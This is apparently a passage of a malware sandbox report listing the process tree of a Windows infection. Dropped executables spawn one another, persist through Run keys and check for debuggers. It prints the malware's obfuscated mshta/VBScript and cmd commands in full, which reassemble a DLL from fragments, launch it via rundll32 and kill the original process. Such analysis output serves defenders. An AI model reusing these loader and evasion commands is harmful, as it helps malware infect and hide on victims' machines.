C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f /Im "sfx_123_206.exe"10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0, trUE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6&cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "13⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\control.execontrol ..\kZ_AmsXL.6G13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G14⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G15⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G16⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-6G8EC.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-6G8EC.tmp\setup_2.tmp" /SL5="$500AA,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-4R1N9.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-4R1N9.tmp\setup_2.tmp" /SL5="$502B4,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
-
C:\Users\Admin\AppData\Local\Temp\is-G0A2L.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-G0A2L.tmp\postback.exe" ss111⤵
-
C:\Users\Admin\AppData\Local\Temp\xiuyingzhang-game.exe"C:\Users\Admin\AppData\Local\Temp\xiuyingzhang-game.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1008c7d6874.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri1008c7d6874.exeFri1008c7d6874.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10b0a06a73706.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri10b0a06a73706.exeFri10b0a06a73706.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\1545689.scr"C:\Users\Admin\AppData\Roaming\1545689.scr" /S6⤵
-
C:\Users\Admin\AppData\Roaming\8350716.scr"C:\Users\Admin\AppData\Roaming\8350716.scr" /S6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\3012335.scr"C:\Users\Admin\AppData\Roaming\3012335.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\1957141.scr"C:\Users\Admin\AppData\Roaming\1957141.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\5918144.scr"C:\Users\Admin\AppData\Roaming\5918144.scr" /S6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1018ef4aa251c026c.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri1018ef4aa251c026c.exeFri1018ef4aa251c026c.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10720d229511df563.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri10720d229511df563.exeFri10720d229511df563.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10fcc13ae0125c8.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri10fcc13ae0125c8.exeFri10fcc13ae0125c8.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri105268dda3.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri105268dda3.exeFri105268dda3.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 2446⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10acd1e0a9e6.exe /mixone4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10d184202996a0d7f.exe4⤵
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv bIwyp2o330q1fggh9KFnew.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri10d184202996a0d7f.exeFri10d184202996a0d7f.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri10acd1e0a9e6.exeFri10acd1e0a9e6.exe /mixone1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5304 -s 2442⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\is-MHCJ5.tmp\Fri10fcc13ae0125c8.tmp"C:\Users\Admin\AppData\Local\Temp\is-MHCJ5.tmp\Fri10fcc13ae0125c8.tmp" /SL5="$10220,239846,156160,C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri10fcc13ae0125c8.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-M5BBB.tmp\Sayma.exe"C:\Users\Admin\AppData\Local\Temp\is-M5BBB.tmp\Sayma.exe" /S /UID=burnerch22⤵
-
C:\Program Files\MSBuild\ZCHWNTMNHE\ultramediaburner.exe"C:\Program Files\MSBuild\ZCHWNTMNHE\ultramediaburner.exe" /VERYSILENT3⤵
-
C:\Users\Admin\AppData\Local\Temp\is-4I113.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-4I113.tmp\ultramediaburner.tmp" /SL5="$80080,281924,62464,C:\Program Files\MSBuild\ZCHWNTMNHE\ultramediaburner.exe" /VERYSILENT4⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu5⤵
-
C:\Users\Admin\AppData\Local\Temp\ad-b57fb-ee0-adcb2-f27dd7534f889\Pozhubicidu.exe"C:\Users\Admin\AppData\Local\Temp\ad-b57fb-ee0-adcb2-f27dd7534f889\Pozhubicidu.exe"3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e64⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffcae8846f8,0x7ffcae884708,0x7ffcae8847185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2244 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:35⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2648 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:15⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5708 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5708 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1808 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4596 /prefetch:15⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Loads dropped DLL
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4720 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3136 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1248 /prefetch:15⤵
-
                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6032 /prefetch:1
                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1040 /prefetch:8
                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:1
                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6304 /prefetch:1
                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4056 /prefetch:1
                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1
                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5240 /prefetch:8
                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1
                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1880 /prefetch:1
                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6232 /prefetch:1
                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7108 /prefetch:1
                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1244 /prefetch:8
                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6184 /prefetch:1
                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6588 /prefetch:1
                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6596 /prefetch:1
                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5164 /prefetch:8
                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6232 /prefetch:8
                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3872 /prefetch:1
                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:1
                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4604 /prefetch:1
                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6896 /prefetch:1
                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1908 /prefetch:1
            C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
